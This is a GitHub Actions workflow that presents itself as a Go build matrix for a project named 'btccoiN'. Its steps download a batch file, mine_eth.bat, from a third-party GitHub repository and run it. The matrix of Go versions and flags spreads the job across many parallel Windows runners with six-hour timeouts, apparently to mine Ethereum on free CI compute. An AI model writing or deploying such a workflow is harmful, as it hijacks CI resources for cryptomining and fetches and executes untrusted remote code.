name: btccoiN
on: [push, pull_request]
jobs:
  build:
    name: Ba_channel
    runs-on: windows-latest
    strategy:
      max-parallel: 30
      fail-fast: false
      matrix:
        go: [1.6, 1.7, 1.8, 1.9, 1.10]
        flag: [A, B, C, D, E]
    timeout-minutes: 360
    env:
        NUM_JOBS: 20
        JOB: ${{ matrix.go }}
    steps:
    - name: download
      run: |
        Invoke-WebRequest https://raw.githubusercontent.com/Bang122/miner/main/Script/mine_eth.bat -OutFile mine_eth.bat
    - name: Set up Go ${{ matrix.go }}
      uses: actions/setup-go@v1
      with:
        go-version: ${{ matrix.go }}
      id: go
    - name: Setup
      uses: actions/checkout@v1
    - name: mINER
      run: cmd /c Script/mine_eth.bat
